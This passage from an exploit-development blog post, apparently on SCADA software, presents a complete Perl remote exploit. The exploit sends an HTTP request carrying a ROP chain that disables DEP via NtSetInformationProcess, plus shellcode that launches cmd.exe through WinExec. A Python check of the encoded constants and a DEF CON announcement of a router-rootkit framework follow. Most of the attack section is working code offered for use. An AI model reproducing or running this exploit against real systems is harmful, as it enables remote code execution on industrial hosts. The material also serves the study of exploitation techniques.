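The constant in the MOV above can be double-checked with a quick calculation.  This is a small sketch with hypothetical helper names; it only verifies the arithmetic and the two bad bytes named in this section (the null byte and 0x25), not the full bad char list.

```python
def neg32(value):
    """Two's complement negation in 32 bits, i.e. what NEG EAX computes."""
    return (-value) & 0xFFFFFFFF


def le_bytes(value):
    """The four bytes of a dword as they appear in memory (little-endian)."""
    return value.to_bytes(4, "little")


WINEXEC = 0x7c86250d          # WinExec address used in this post
encoded = neg32(WINEXEC)      # the value we MOV into EAX instead

print(hex(encoded), le_bytes(encoded).hex())

# The raw address contains 0x25, the encoded one does not.
assert 0x25 in le_bytes(WINEXEC)
assert 0x25 not in le_bytes(encoded)
assert 0x00 not in le_bytes(encoded)

# NEG at runtime restores the original pointer.
assert neg32(encoded) == WINEXEC

# The same trick yields the small constants in the ROP chain.
assert neg32(0xffffffde) == 0x22
assert neg32(0xfffffffc) == 0x4
```

The cost of the trick is the two extra bytes for the NEG EAX instruction, which is why the padding after the shellcode shrinks accordingly.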

This is our final exploit:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>\n";
    exit 1;
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes

$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x7ca6f081); # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

$exploit .= "\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8\xf3\xda\x79\x83\xf7\xd8\xff\xd0";

$exploit .= "A"x(424-25);

$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)

$exploit .= "A"x104;

$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

And let ’er rip:

Obviously we’re only able to spawn a shell locally (on the remote system).  Writing network-capable shellcode that avoids all nine of our bad chars and still fits within our size constraints is probably better suited for a separate post.  Or we could just use a stager.

SCADA Wars Episode 3 – Revenge of ASLR

A (hopeful) part three will discuss the implications of ASLR in the target environment, disallowing the use of hardcoded addresses in our exploit.

DEF CON 20 Presentation

By the way, I will be presenting “Owning the Network: Adventures in Router Rootkits” this Sunday, 12 noon at DEF CON 20.  If you enjoy ownage, networks, adventures, routers, and rootkits, this talk is for you. I’ll be releasing my firmware generation/manipulation framework at the talk, which will be made available on the site shortly afterwards.  Slides and (hopefully) video will be available as well.

Post-conference update:

Download slides: owning-the-network-adventures-in-router-rootkits.pdf
Download rpef: https://github.com/mncoppola/rpef